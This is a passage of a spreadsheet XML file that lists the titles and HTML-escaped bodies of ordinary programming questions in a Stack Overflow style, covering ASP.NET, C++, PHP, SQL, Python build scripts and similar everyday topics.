&amp;lt;li class="active first"&amp;gt;&amp;lt;a href="#" class="home"&amp;gt;Home&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="news"&amp;gt;News&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="offers"&amp;gt;Special offers&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="private"&amp;gt;Private label&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="locations"&amp;gt;Locations&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="about"&amp;gt;About us&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="jobs"&amp;gt;Jobs&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="contact"&amp;gt;Contact us&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;a href="#" class="mm"&amp;gt;Multimedia&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MENU: &lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/8ANuL.jpg" alt="alt text"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET removing an item from Session?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which method is preferred?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Session.Remove("foo");
Session["foo"] = null;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best algorithm to check whether a vector is sorted</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the best way to check that a &lt;code&gt;std::vector&lt;/code&gt; is sorted? Is there something faster than a loop checking that &lt;code&gt;v[i]&amp;lt;=v[i+1]&lt;/code&gt;? Is it faster/cleaner with iterators? Or is it actually better to just call &lt;code&gt;sort&lt;/code&gt; every time (though the "v is already sorted" case is quite common)?&lt;/p&gt;
&lt;p&gt;We can safely assume the vector only contains PODs, usually &lt;code&gt;float&lt;/code&gt;s and sometimes &lt;code&gt;double&lt;/code&gt;s and &lt;code&gt;int&lt;/code&gt;s.&lt;/p&gt;
&lt;p&gt;The size of the vector is non-trivial (usually a few thousands items) but not extreme (not gigabyte-sized).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;in some instances we'll sort the vector immediately afterwards, however there are other instances where we don't (it's an error case of our algorithm).&lt;/li&gt;
&lt;li&gt;we already use a flag "IsSorted" whenever possible.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Find JPEG resolution with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Calling all PHP gurus!&lt;/p&gt;
&lt;p&gt;I understand that you can use getimagesize() to get the actual pixel height and width of an image in PHP. However, if you open an image in photoshop and look at the image size dialog, you notice that there is a resolution value that determines the print size of the image.&lt;/p&gt;
&lt;p&gt;Given an arbitrary jpg image file, I need to use PHP to determine this resolution number. It appears that this information is stored in the jpg file somewhere, so how do I get to it?&lt;/p&gt;
&lt;p&gt;One other requirement - I only have gdlib available to me. I need to do this without the use of other php libraries (imagemagick, etc.)&lt;/p&gt;
&lt;p&gt;Thanks for the help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Addicted to LINQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, the more I use LINQ, the more I like it! I recently found myself working in some legacy code at work. It is your classic DataSet and DataTable rich application. Well, when adding a bit of functionality I found myself &lt;em&gt;really&lt;/em&gt; wanting to just query the rows of a DataTable for the results I was looking for.&lt;/p&gt;
&lt;p&gt;Let me repeat that... instead of looping and adding to a temp collection, I just wanted to ask the Rows collection for what I needed. No looping, no temp variables, just give me what I want.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var customerOrderIds = table.Rows.Cast&amp;lt;DataRow&amp;gt;()
   .Where(x =&amp;gt; (string)x["CUSTOMER_ID"] == customerId)
   .Select(x =&amp;gt; (string)x["CUSTOMER_ORDER_ID"])
   .Distinct();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;My question is whether or not this is a good thing, or am getting carried away with LINQ?&lt;/strong&gt; It does seem to me that this declarative style of pulling a subset of data out of a collection is a good thing and more readable in the end. But then again, maybe I'm just smitten :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good Javascript Combo Box replacement for combo boxes with tons of elements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a page where my combo box has hundreds of elements which makes it very hard to pick the one item I want. Is there a good Javascript replacement that would do better than&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select id="field-component" name="field_component"&amp;gt; 
                  &amp;lt;option selected="selected"&amp;gt;1&amp;lt;/option&amp;gt;&amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;...
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there something with "Intellisense"-like auto-complete?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to keep inline items from wrapping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got menu items that look like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;Item1&amp;lt;span class="context-trigger"&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Item2&amp;lt;span class="context-trigger"&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Item3&amp;lt;span class="context-trigger"&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with CSS that turns the above into a horizontal menu, and JS that turns the [spans] into buttons that bring up contextual menus. Vaguely like this:&lt;/p&gt;
&lt;pre&gt;
  Item1^  Item2^  Item3^
&lt;/pre&gt;
&lt;p&gt;If the menu gets too wide for the browser width, it wraps, which is what I want. The problem is that sometimes it's putting in line-breaks before the [spans]. I only want it to break between [li]s. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I know if a process is running?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I get a reference to a &lt;code&gt;System.Diagnostics.Process&lt;/code&gt;, how can I know if a process is currently running?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Negotiating a common "network-channel" in a peer-to-peer system</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a common or established algorithm for peer-nodes in a network to decide on a unique "network-channel" (or any other form of semi-secret identifier)?&lt;/p&gt;
&lt;p&gt;The environment I'm working in is SecondLife.  I am trying to figure out how to get many identical peer scripted objects to agree on a "channel" number which allows them to form a network, without interfering with other existing networks of the same kind of objects.&lt;/p&gt;
&lt;p&gt;All objects get instantiated at roughly the same time, and have access to the (common) system time.&lt;/p&gt;
&lt;p&gt;Approaches I've thought of:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Time-of-instantiation based.  Channel is derived (by md5) from the unix time.  Problem is the "&lt;strong&gt;roughly&lt;/strong&gt; the same time" part.  They may get instantiated right on the cusp of a new second.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Random wait.  Make objects wait a random amount, and announce a (randomly generated) channel number decided upon by the first one to wake.  Problem is, the system has a low time granularity, and more than one object can wake before the announcement was processed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Combine 1 and 2.  Announce a high-res timestamp after waiting a random amount, and derive channel from the lowest announced timestamp.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This has to be something smarter people than me have thought about.  Any better way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Qt: how to make a shadow to main window widget?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to make a shadow to main window widget on windows using Qt?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Secure file transfers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using a custom FTP application (which encrypts the files) for secure transfers.  We send the application to end users and they use it to send us confidential data.  We also use it to send information back to the end users.&lt;/p&gt;
&lt;p&gt;The application is in need of an update - some things are no longer working consistently.  As the end users get more restrictive security environments, as OS updates are released, etc.&lt;/p&gt;
&lt;p&gt;We have several options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Update the application, use SFTP, etc.&lt;/li&gt;
&lt;li&gt;Write a new custom web application to add to our aspx website.&lt;/li&gt;
&lt;li&gt;Purchase or download SFTP software&lt;/li&gt;
&lt;li&gt;Purchase or download web software&lt;/li&gt;
&lt;li&gt;Setup an external sharepoint site&lt;/li&gt;
&lt;li&gt;Use a service which is hosted elsewhere - preferably in Canada so that our laws apply&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Some of features which would be nice:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We would not want decrypted files sitting on a server outside the firewall.&lt;/li&gt;
&lt;li&gt;Resumable transfers.&lt;/li&gt;
&lt;li&gt;Ability to move the files automatically to a specific place inside our firewall.  Though this could be easily done outside the file transfer.&lt;/li&gt;
&lt;li&gt;Notifications for both sender and recipient by email.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Suggestions/comments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is using '*' to build a view bad?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why is using '*' to build a view bad ?&lt;/p&gt;
&lt;p&gt;Suppose that you have a complex join and all fields may be used somewhere.&lt;/p&gt;
&lt;p&gt;Then you just have to chose fields needed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT field1, field2 FROM aview WHERE ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The view "aview" could be &lt;code&gt;SELECT table1.*, table2.* ... FROM table1 INNER JOIN table2 ...&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;We have a problem if 2 fields have the same name in table1 and table2.&lt;/p&gt;
&lt;p&gt;Is this only the reason why using '*' in a view is bad?&lt;/p&gt;
&lt;p&gt;With '*', you may use the view in a different context because the information is there.&lt;/p&gt;
&lt;p&gt;What am I missing ?&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>making a programme run indefinitely in python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to make a function (the ones I'm thinking of are in the style of the simple ones I've made which generate the fibonnacci sequence from 0 to a point, and all the primes between two points) run indefinitely.   E.g. until I press a certain key or until a time has passed, rather than until a number reaches a certain point? &lt;/p&gt;
&lt;p&gt;Also, if it is based on time then is there any way I could just extend the time and start it going from that point again, rather than having to start again from 0? I am aware there is a time module, i just don't know much about it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what's the quickest way to extract a 5 digit number from a string in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what's the quickest way to extract a 5 digit number from a string in c#. &lt;/p&gt;
&lt;p&gt;I've got &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string.Join(null, System.Text.RegularExpressions.Regex.Split(expression, "[^\\d]"));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any others?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SourceSafe Label Search</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to search Microsoft Visual SourceSafe 6.0d for all files tagged with a specific label?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net 2.0 Winform Label Tool Tip</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This has got to be something I just missed, but how do I add a tool tip to a label?&lt;/p&gt;
&lt;p&gt;I saw something on the web about handling the mouse hover event, but how would I even handle it in code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable opacity within a WPF application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My problem is:&lt;/p&gt;
&lt;p&gt;I have a Canvas which covers part of my Window. The Opacity of the canvas is set to less than 1, i.e. I can view the controls under the Canvas. What I would like to do is place a control, any control, say a Button, on the canvas and not have that Button semitransparent. Is this possible using WPF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript onHover event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a canonical way to set up a JS onHover event with the existing onmouseover, onmouseout and some kind of timers?  Or just any method to fire an arbitrary function if and only if user has hovered over element for certain amount of time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Agile 40-hour week</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have you ever worked on a (full-time) project where using Agile methodologies actually allowed you to accomplish a 40-hour work-week? If so, what were the most valuable agile practices?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>openbd cfloop over a date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to convert my sites from CF8 to openBD.  I have a cfloop in a site that loops over a date range.&lt;/p&gt;
&lt;p&gt;In essence, I want to insert a new record into the db for every 2 weeks (step) of a date range (from and to)&lt;/p&gt;
&lt;p&gt;my loop looks like this... &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfloop 
  from  = "#form.startDate#" 
  to    = "#form.endDate#" 
  index = "i" 
  step  = "#theStep#"
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works perfectly in CF8, in openBD, I get this error...
Data not supported: value [11/05/09] is not a number&lt;/p&gt;
&lt;p&gt;Any ideas of a work around?&lt;/p&gt;
&lt;p&gt;Thx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can my web server be at one hosting company, and my email hosted by a 3rd party?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web server that runs my web application.&lt;/p&gt;
&lt;p&gt;If I want to outsource my email to another provider, is it possible if they are on their on network/data center?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your favorite cross domain cookie sharing approach?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I see iframe/p3p trick is the most popular one around, but I personally don't like it because javascript + hidden fields + frame really make it look like a hack job. I've also come across a master-slave approach using web service to communicate (&lt;a href="http://www.15seconds.com/issue/971108.htm"&gt;http://www.15seconds.com/issue/971108.htm&lt;/a&gt;) and it seems better because it's transparent to the user and it's robust against different browsers. &lt;/p&gt;
&lt;p&gt;Is there any better approaches, and what are the pros and cons of each?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>range for integer values of chars in c++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm reading &lt;em&gt;The C++ Programming Language&lt;/em&gt; and in it Stroustrup states that the int value of a char can range from 0 to 255 or -127 to 127, depending on implementation. Is this correct? It seems like it should be from -128 to 127.  If not, why are their only 255 possible values in the second implementation possibility, not 256.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showing too much 'skin' detection in software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building an ASP.NET web site where the users may upload photos of themselves. There could be thousands of photos uploaded every day. One thing my boss has asked a few time is if there is any way we could detect if any of the photos are showing too much 'skin' and automatically move flag these as 'Adults Only' before the editors make the final decision. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best algorithm for an overridden System.Object.GetHashCode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET &lt;code&gt;System.Object.GetHashCode&lt;/code&gt; method is used in a lot of places,  throughout the .NET base class libraries. Especially when finding items in a collection fast or to determine equality. Is there a standard algorithm/ best practice on how to implement the &lt;code&gt;GetHashCode&lt;/code&gt; override for my custom classes so I don't degrade performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>We have a graphical designer, now they want a text based designer. Suggestions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sorry I could not think of a better title.&lt;/p&gt;
&lt;p&gt;The problem is the following:&lt;/p&gt;
&lt;p&gt;For our customer we have created (as part of a larger application) a
graphical designer which they can use to build "scenario's".&lt;/p&gt;
&lt;p&gt;These scenario's consist of "Composites" which in turn consist
of "Commands". These command objects all derive from CommandBase and
implement an interface called ICompilable.&lt;/p&gt;
&lt;p&gt;The scenario class also implements ICompilable. When Compile() is called
on a command an array of bytes is returned which can then be send to the device
for which they are intended (can't disclose to much info about that hardware, sorry)&lt;/p&gt;
&lt;p&gt;Just to give you an idea:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var scenario = new Scenario();
scenario.Add(new DelayCommand(1));
scenario.Add(new CountWithValueCommand(1,ActionEnum.Add,1));
scenario.Add(new DirectPowerCommand(23,false,150));
scenario.Add(new WaitCommand(3));
scenario.Add(new DirectPowerCommand(23,false,150));
scenario.Add(new SkipIfCommand(1,OperatorEnum.SmallerThan,10));
scenario.Add(new JumpCommand(2));
byte[] compiledData = scenario.Compile();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The graphical designer abstracts all this from the user and allows
him (or her) to simply drag en drop composites onto the designer surface.
(Composites can group commands so we can provide building blocks for returning tasks)&lt;/p&gt;
&lt;p&gt;Recently our customer came to us and said, "well the designer is really cool,
but we have some people who would rather have some kind of programming language,
just something simple."&lt;/p&gt;
&lt;p&gt;(Simple to them of course)&lt;/p&gt;
&lt;p&gt;I would very much like to provide them with a simple language,
that can call various commmands and also replace SkipIfCommand with
a nicer structure, etc...&lt;/p&gt;
&lt;p&gt;I have no idea where to start or what my options are (without breaking what we have)&lt;/p&gt;
&lt;p&gt;I have heard about people embedding languages such as Python,
people writing their own language an parsers, etc...&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;PS: Users only work with composites, never with commands.
    Composites are loaded dynamically at runtime (along with their graphical designer)
    and may be provided by third parties in seperate assemblies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a performance hit when "Windows" authentication is enabled on an anonymous website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been having performance issues with a high traffic ASP.NET 2.0 site running on Windows 2000.  While editing the web.config file I noticed that the authentication mode was set to 'Windows'.  I changed it to 'None'.  The only users this site has are anonymous and it gets 25,000+ page views at day.  Could this have been a caused performance issues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>launching VS2008 build from python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;if I paste this into the command prompt by hand, it works, but if I run it from python, I get &lt;code&gt;The filename, directgory name, or volume label syntax is incorrect&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;os.system('%comspec% /k ""C:\Program Files\Microsoft Visual Studio 9.0\VC\vcvarsall.bat"" x86')
os.system('devenv Immersica.sln /rebuild Debug /Out last-build.txt')
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>fragment was not found at expected path (eclipse jsp)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In eclipse, I have a javaproject (not a web project), though it does provide reusable tag files.&lt;/p&gt;
&lt;p&gt;layout&lt;/p&gt;
&lt;p&gt;+src&lt;br&gt;
+++META-INF&lt;br&gt;
----my.tld&lt;br&gt;
+++++++++++tags&lt;br&gt;
---------------include.jsp&lt;br&gt;&lt;/p&gt;
&lt;p&gt;I keep on getting Fragment "/META-INF/tags/include.jsp" was not be found at expected path /Project/META-INF/tags/taginclude.jsp&lt;/p&gt;
&lt;p&gt;How can I modify the path eclipse is looking for? I need to tell it to include "src" in the lookup&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to add user ID to RubyOnRails log entries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for the best way to customize my Rails log entries (I want to add the user ID in there). I am using Rails 2.1.2. The only way I've found so far is to override method "add" of class BufferedLogger (as defined in active_support/lib/active_support). &lt;/p&gt;
&lt;p&gt;But it ain't pretty: I have to copy all the code in there and it is 
closely tied to the current implementation. Is there a better way? 
I found this on the Google: &lt;a href="http://pandejo.blogspot.com/2007/08/customize-logger-message-format.html" rel="nofollow"&gt;http://pandejo.blogspot.com/2007/08/customize-logger-message-format.html&lt;/a&gt; but it seems outdated. 
One day, I might create a specific audit log, but it is overkill for 
what I need: &lt;a href="http://maintainable.com/articles/rails_logging_tips#audit-logs" rel="nofollow"&gt;http://maintainable.com/articles/rails_logging_tips#audit-logs&lt;/a&gt; 
Cheers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to move documents and list items in Windows SharePoint Services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to provide users with an easy way to move documents and lists items in WSS 3.0. They want to be able to move across lists, sites and site collections without loss of version history, metadata, and author/date info. This functionality is unfortunately not available OOB. Anyone know a good solution/product?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>launching vs2008 build from python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The first batch file launches a command prompt, i need the second command to be in the ccontext of the first.  how can I do this in python?&lt;/p&gt;
&lt;p&gt;As is, it launches the batch, and blocks until the batch (with its command prompt context) terminates, and then executes &lt;code&gt;devenv&lt;/code&gt; without the necessary context.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;os.system(r'%comspec% /k ""C:\Program Files\Microsoft Visual Studio 9.0\VC\vcvarsall.bat"" x86')
os.system(r'devenv asdf.sln /rebuild Debug /Out last-build.txt')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;think of it as in i'm in bash, and i need to execute a command in a perl context, so i type &lt;code&gt;perl -c 'asdf'&lt;/code&gt;.  executing perl and asdf back to back won't work, i need to get the &lt;code&gt;devenv&lt;/code&gt; inside of the perl context.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you create a Distinct query in HQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to create a Distinct query in HQL.  Either by using the "distinct" keyword or some other method.  I am not sure if distinct is a valid keywork for HQL, but I am looking for the HQL equivalent of the SQL keyword "distinct".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the width &amp; height of a terminal window?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a simple example, I want to write a CLI script which can print '=' across the entire width of the terminal window.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env php
&amp;lt;?php
echo str_repeat('=', ???);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python
print '=' * ???
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env bash
x=0
while [ $x -lt ??? ]; do echo -n '='; let x=$x+1 done; echo
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Fastest possible XML handling in Delphi for very large documents</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need recommendations on what to use in Delphi (I use Delphi 2009) to handle very large XML files (e.g. 100 MB) as fast as possible. &lt;/p&gt;
&lt;p&gt;I need to input the XML, access and update the data in it from my program, and then export the modified XML again.&lt;/p&gt;
&lt;p&gt;Hopefully the input and output could be done within a few seconds on a fast Windows machine.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Clarification. I expect I will need to use DOM, because access to the data structure for developing reports and making updates to the data is important, and I need this functionality to be very fast.&lt;/p&gt;
&lt;p&gt;The input is only done once for File Loading and the output done only for File saving, usually just once upon exit. These should be quick as well, but are not as important as the in-memory data access and update.&lt;/p&gt;
&lt;p&gt;My understanding is that 3rd party parsers only help with input and output, but not on using and modifying the data once loaded into memory. Or am I mistaken on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you used a traveling salesman algorithm to solve a problem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I studied TSP in college in the context of NP Completeness.   I have never actually had a situation where it would apply to a practical problem.    A little bit of research shows that it has been used to pick the cheapest path to move a drill around, that is making holes in circuit boards.  That is pretty much all I could find.&lt;/p&gt;
&lt;p&gt;Are you using it?   What other practical applications does the TSA have?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I calculate the closest power of 2 or 10 a number is?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the most efficient way to cacluate the closest power of a 2 or 10 to another number? e.g.&lt;/p&gt;
&lt;p&gt;3.5 would return 4 for power of 2 and 1 for power of 10&lt;/p&gt;
&lt;p&gt;123 would return 128 for power of 2 and 100 for power of 10&lt;/p&gt;
&lt;p&gt;0.24 would return 0.25 for power of 2 and 0.1 for power of 10&lt;/p&gt;
&lt;p&gt;I'm just looking for the algorithm and don't mind the language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In SQL, how to delete a row from one table if it doesn't have a corresponding row in another table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I make:&lt;/p&gt;
&lt;p&gt;DELETE FROM foo WHERE id=1 AND &lt;strong&gt;bar not contains id==1&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To elaborate, how can I remove a row with &lt;code&gt;id = 1&lt;/code&gt;, from table &lt;code&gt;foo&lt;/code&gt;, only if there is not a row in table &lt;code&gt;bar&lt;/code&gt; with &lt;code&gt;id = 1&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to move build task into parent POM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a POM for my ejb project. In it I have added a maven-antrun-plugin execution step to build websphere ejb stubs during the verify phase. This works but is quite verbose, and as I need to add similiar steps to a number of other ejb projects I want to move the common section to a parent POM for all our ejbs. &lt;/p&gt;
&lt;p&gt;My first try was to just move the entire build tag to the parent POM but this failed during install/deploy of the parent as the verify step was executed for the parent POM instead of just for the child POM.&lt;/p&gt;
&lt;p&gt;My second try involved specifying ejb:verify for the phase. This partially succeeded in that the parent POM was deployable. However the verify step was not executed for the child POM.&lt;/p&gt;
&lt;p&gt;I have tried several other variations including specifying a phase of ejb, ejb:ejb and specifying true in the plugin definition.&lt;/p&gt;
&lt;p&gt;What is the correct way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make HTTP post request for getting JSON object in response for iPhone application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've a web service running on server which return data either in XML format or JSON format.
I wanted to request a JSON format but using HTTP Post method.&lt;/p&gt;
&lt;p&gt;any help greatly appreciated.&lt;/p&gt;
&lt;p&gt;thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are real-time linux extensions obsolete?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do the new real-time and low latency patches from Ingo Molnar render previous real-time extensions for Linux (such as RTAI, Xenomai) obsolete?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spell checking city names?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I figure this problem is easier than just a regular spell checker since the list of U.S cities is small compared to all known English words.&lt;/p&gt;
&lt;p&gt;Anyhow, here's the problem:
I have text files with full of city names; some of which are spelled correctly and some which aren't. &lt;/p&gt;
&lt;p&gt;What kind of algorithm can I use to correct all the misspellings of city names?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to discover what Linux distribution is in use</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sometimes I need to access some servers running Linux (or maybe another Unix-like SO), but I don't know how to verify which &lt;a href="http://en.wikipedia.org/wiki/Linux_distribution"&gt;distribution&lt;/a&gt; is in use on the server (there are times that even the "responsible" person for the server doesn't know). &lt;/p&gt;
&lt;p&gt;Is there an easy and reliable way to discover that, one that is uniform and consistent across all of them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an alternative for sleep() in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In traditional embedded programming, we will give a delay function like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(i=0;i&amp;lt;255;i++)
   for(j=0;j&amp;lt;255;j++);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the microprocessor's view, is this how the sleep() function works?&lt;/p&gt;
&lt;p&gt;Is there an alternative for the sleep() function in C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataList, Conditional statements in &lt;ItemTemplate&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to do the following in ASP.NET 3.5.  Basically, I am binding a LINQDataSource to a DataList.  There is a property called "Deleted" and if it is true, I want to display different markup.  The following code throws errors:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:DataList runat="server"&amp;gt;
    &amp;lt;ItemTemplate&amp;gt;
        &amp;lt;% If CBool(Eval("Deleted")) Then%&amp;gt; 
            ...
        &amp;lt;% Else%&amp;gt;
            ...
        &amp;lt;% End If%&amp;gt;
    &amp;lt;/ItemTemplate&amp;gt;
&amp;lt;/asp:DataList&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible?  If not, what are the alternatives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get a list of the differences between two JavaScript object graphs?</t>
  </si>
  <si>
